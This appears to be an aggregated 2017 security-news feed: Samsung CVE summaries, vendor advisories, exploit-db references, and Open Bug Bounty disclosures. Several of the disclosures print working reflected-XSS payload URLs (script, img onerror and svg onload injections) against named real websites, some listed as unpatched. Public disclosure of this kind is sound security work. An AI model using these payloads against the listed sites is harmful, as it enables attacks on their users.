CVE-2017-18666

An issue was discovered on Samsung mobile devices with KK4.4, L5.0/5.1, M6.0, and N7.x software. Applications can send arbitrary premium SMS messages. The Samsung ID is SVE-2017-8701 June 2017...

CVE-2017-18668

An issue was discovered on Samsung mobile devices with M6.0 software. Attackers can prevent users from making outbound calls and sending outbound text messages. The Samsung ID is SVE-2017-8706 June 2017...

CVE-2017-18664

An issue was discovered on Samsung mobile devices with KK4.4, L5.0/5.1, and M6.0 software. There is a NULL pointer exception in PersonManager, causing memory corruption. The Samsung ID is SVE-2017-8286 June 2017...

CVE-2017-18669

An issue was discovered on Samsung mobile devices with N7.x software. Persona has an unprotected API that allows launch of any activity with system privileges. The Samsung ID is SVE-2017-9000 June 2017...

CVE-2017-18668

An issue was discovered on Samsung mobile devices with M6.0 software. Attackers can prevent users from making outbound calls and sending outbound text messages. The Samsung ID is SVE-2017-8706 June 2017...

SAP Business Objects Financial Consolidation Cross-Site Scripting Vulnerability

SAP Business Objects is a suite of business intelligence software and enterprise performance solutions from SAP, Germany. The solution provides reporting, performance management, and data base functionality, and Financial Consolidation is one of the tools used to connect financial systems. A...

NTT DOCOMO Wi-Fi STATION L-02F Software Remote Code Execution Vulnerability

NTT DOCOMO Wi-Fi STATION L-02F Software is a system used in portable routers from NTT DOCOMO Japan. A security vulnerability exists in NTT DOCOMO Wi-Fi STATION L-02F Software L02F-MDM9625-V10h-JUN-23-2017-DCM-JP and prior versions. An attacker can exploit the vulnerability to execute arbitrary co...

Servicing stack update for Windows 10 Version 1703: June 13, 2017

Servicing stack update for Windows 10 Version 1703: June 13, 2017 Summary This update makes stability improvements for the Windows 10 Version 1703 servicing stack. How to get this update Method 1: Windows Update This update will be downloaded and installed automatically. Method 2: Microsoft Updat...

aftek.com XSS vulnerability

Vulnerable URL: http://aftek.com/SearchResults.php?offset=0=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%22=0=0 Details: Description| Value ---|--- Patched:| No Latest check for patch:| 22.09.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank|...

kvhb.de XSS vulnerability

Vulnerable URL: https://www.kvhb.de/ksearch?word=+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28%27OPENBUGBOUNTY%27%29%3C%2FSCRIPT%3E=0=SUCHEN=0buildid=form-2hoyeZ5gE3oTfdgw-zpzOe3igrHg6ixJriYiXN0a8r4id=kvhbsearchblockform Details: Description| Value ---|--- Patched:| No Latest check for...

javout.net XSS vulnerability

Vulnerable URL: https://javout.net/?s=a%27aa%22onfocus=prompt/OPENBUGBOUNTY/%20autofocus=x%20bad=--%3E%3C/title%3E%3C/script%3E%3Cimg%20src=x%20onerror=prompt/OPENBUGBOUNTY/%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 21.09.2017 Vulnerability type:| XSS...

June 28, 2017 – Morning Cyber Coffee Headlines – “Petya” Edition

Good morning! Sit with Carbon Black this morning over a cup of coffee or tea and browse a few industry headlines to get the day started. We’ve got just enough information below to get you through that first cup…enjoy! June 28, 2017 - Headlines Carbon Black in the News: Here's how to protect...

jobinventory.com XSS vulnerability

Vulnerable URL: http://www.jobinventory.com/search?q=%3E%27%3E%22%3Ee%3Ci%3E5%3Csvg%2Fonload%3Dalert%28%2Fopenbugbounty%2F%29%3E=%3E%27%3E%22%3Ee%3Ci%3E5%3Csvg%2Fonload%3Dalert%28%2Fopenbugbounty%2F%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 26.07.2017...

CVE-2017-1000371

creationtimestamp| type| source ---|---|--- 2017-06-28 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/42273 2017-06-28 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/42276...

CVE-2017-9810

creationtimestamp| type| source ---|---|--- 2017-06-28 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/42269...

CVE-2017-9812

creationtimestamp| type| source ---|---|--- 2017-06-28 00:00:00+00:00| exploited| https://www.exploit-db.com/exploits/42269...

secure.friendsofbell.com XSS vulnerability

Vulnerable URL: https://secure.friendsofbell.com/np/clients/friendsofbell/tellFriend.jsp?subject=Attending%20Bet%20on%20Bell!=/%27%22--!%3E%20%3Cimg%20src=x%20onerror=alert%22openbugbounty%22%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 29.07.2017 Vulnerability...

oaj.fi XSS vulnerability

Open Bug Bounty ID: OBB-252756 Description| Value ---|--- Affected Website:| oaj.fi Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

archon.library.tamu.edu XSS vulnerability

Vulnerable URL: http://archon.library.tamu.edu/index.php?p=core/contact=email=%22--%3E%3C%2Fscript%3E%3Csvg%2Fonload%3D%27%3Balert%28%2Fxssposed%2F%29%3B%27%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 29.07.2017 Vulnerability type:| XSS Vulnerability status:|...

av.mytubes.xyz XSS vulnerability

Vulnerable URL: http://av.mytubes.xyz/v/://2/www.maturesexmilfs.ws/%3C/script%3E%3Cimg%20src=x%20onerror=prompt/XSSPOSED/%3E//title/script%20img%20src%20x%20onerror%20prompt%20xssposed%20xhamster%20free%20porn%20movies%20... Details: Description| Value ---|--- Patched:| No Latest check for patch:...